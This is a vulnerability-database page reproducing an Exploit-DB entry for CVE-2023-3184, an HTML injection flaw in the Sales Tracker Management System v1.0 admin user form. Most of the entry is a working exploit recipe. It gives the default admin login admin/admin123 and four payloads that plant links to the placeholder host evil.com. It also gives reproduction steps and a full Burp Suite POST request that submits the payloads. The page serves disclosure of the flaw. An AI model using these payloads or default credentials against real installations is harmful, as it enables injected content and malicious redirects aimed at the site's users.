Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Sales Tracker Management System v1.0 - Multiple Vulnerabilities

šŸ—“ļøĀ 13 Jun 2023Ā 00:00:00Reported byĀ AFFAN AHMEDTypeĀ 
exploitdb
Ā exploitdbšŸ”—Ā www.exploit-db.comšŸ‘Ā 312Ā Views

Sales Tracker Management System v1.0 - Multiple Vulnerabilities. Exploit scenario, steps to reproduce, payload used, and burpsuite reques

Related
Code
ReporterTitlePublishedViews
Family
0day.today		Sales Tracker Management System v1.0 - Multiple Vulnerabilities
13 Jun 202300:00
ā€“zdt
Circl		CVE-2023-3184
9 Jun 202316:21
ā€“circl
CNNVD		Sales Tracker Management System č·Øē«™č„šęœ¬ę¼ę“ž
9 Jun 202300:00
ā€“cnnvd
CVE		CVE-2023-3184
9 Jun 202313:00
ā€“cve
Cvelist		CVE-2023-3184 SourceCodester Sales Tracker Management System cross site scripting
9 Jun 202313:00
ā€“cvelist
EUVD		EUVD-2023-43865
3 Oct 202520:07
ā€“euvd
NVD		CVE-2023-3184
9 Jun 202313:15
ā€“nvd
OSV		CVE-2023-3184
9 Jun 202313:15
ā€“osv
Packet Storm		Sales Tracker Management System 1.0 HTML Injection
14 Jun 202300:00
ā€“packetstorm
Prion		Cross site scripting
9 Jun 202313:15
ā€“prion
Rows per page
Exploit Title: Sales Tracker Management System v1.0 ā€“ Multiple Vulnerabilities 
Google Dork: NA
Date: 09-06-2023
EXPLOIT-AUTHOR: AFFAN AHMED
Vendor Homepage: <https://www.sourcecodester.com/>
Software Link: <https://www.sourcecodester.com/download-code?nid=16061&title=Sales+Tracker+Management+System+using+PHP+Free+Source+Code>
Version: 1.0
Tested on: Windows 11 + XAMPP
CVE : CVE-2023-3184

==============================
CREDENTIAL TO USE
==============================
ADMIN-ACCOUNT
USERNAME: admin
PASSWORD: admin123

=============================
PAYLOAD_USED
=============================
1. <a href=//evil.com>CLICK_HERE_FOR_FIRSTNAME</a>
2. <a href=//evil.com>CLICK_HERE_FOR_MIDDLENAME</a>
3. <a href=//evil.com>CLICK_HERE_FOR_LASTNAME</a>
4. <a href=//evil.com>CLICK_HERE_FOR_USERNAME</a>


===============================
STEPS_TO_REPRODUCE
===============================
1. FIRST LOGIN INTO YOUR ACCOUNT BY USING THE GIVEN  CREDENTIALS OF ADMIN 
2. THEN NAVIGATE TO USER_LIST AND CLCIK ON `CREATE NEW` BUTTON OR VISIT TO THIS URL:`http://localhost/php-sts/admin/?page=user/manage_user` 
3. THEN FILL UP THE DETAILS AND PUT THE ABOVE PAYLOAD IN `firstname` `middlename`  `lastname` and in `username` 
4. AFTER ENTERING THE PAYLOAD CLICK ON SAVE BUTTON
5. AFTER SAVING THE FORM YOU WILL BE REDIRECTED TO ADMIN SITE WHERE YOU CAN SEE THAT NEW USER  IS ADDED  .
6. AFTER CLICKING ON THE  EACH PAYLOAD IT REDIRECT ME TO EVIL SITE



==========================================
BURPSUITE_REQUEST
==========================================
POST /php-sts/classes/Users.php?f=save HTTP/1.1
Host: localhost
Content-Length: 1037
sec-ch-ua: 
Accept: */*
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary7hwjNQW3mptDFOwo
X-Requested-With: XMLHttpRequest
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.110 Safari/537.36
sec-ch-ua-platform: ""
Origin: http://localhost
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost/php-sts/admin/?page=user/manage_user
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=r0ejggs25qnlkf9funj44b1pbn
Connection: close

------WebKitFormBoundary7hwjNQW3mptDFOwo
Content-Disposition: form-data; name="id"


------WebKitFormBoundary7hwjNQW3mptDFOwo
Content-Disposition: form-data; name="firstname"

<a href=//evil.com>CLICK_HERE_FOR_FIRSTNAME</a>
------WebKitFormBoundary7hwjNQW3mptDFOwo
Content-Disposition: form-data; name="middlename"

<a href=//evil.com>CLICK_HERE_FOR_MIDDLENAME</a>
------WebKitFormBoundary7hwjNQW3mptDFOwo
Content-Disposition: form-data; name="lastname"

<a href=//evil.com>CLICK_HERE_FOR_LASTNAME</a>
------WebKitFormBoundary7hwjNQW3mptDFOwo
Content-Disposition: form-data; name="username"

<a href=//evil.com>CLICK_HERE_FOR_USERNAME</a>
------WebKitFormBoundary7hwjNQW3mptDFOwo
Content-Disposition: form-data; name="password"

1234
------WebKitFormBoundary7hwjNQW3mptDFOwo
Content-Disposition: form-data; name="type"

2
------WebKitFormBoundary7hwjNQW3mptDFOwo
Content-Disposition: form-data; name="img"; filename=""
Content-Type: application/octet-stream


------WebKitFormBoundary7hwjNQW3mptDFOwo--

===============================
PROOF_OF_CONCEPT
===============================
GITHUB_LINK: https://github.com/ctflearner/Vulnerability/blob/main/Sales_Tracker_Management_System/stms.md

Data

Build on a solid foundation withĀ Vulners data

WeĀ provide theĀ essential building blocks forĀ cybersecurity solutions withĀ comprehensive, structured, andĀ constantly updated vulnerability andĀ exploits data

Api

Power your application withĀ Vulners API

The Vulners REST API offers reliable, high-performance access toĀ vulnerabilityĀ intelligence, withĀ 99.9%Ā SLAĀ uptime andĀ CDN-backed data delivery forĀ seamlessĀ global access

App

Assess and manage vulnerabilities withĀ VulnersĀ tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
13 Jun 2023 00:00Current
5Medium risk
Vulners AI Score5
CVSS 3.12.4 - 4.8
CVSS 23.3
CVSS 32.4
EPSS0.01157
vulnerabilitiesexploitadmin accountpayloadburpsuitewindows 11xamppcve-2023-3184github_link
312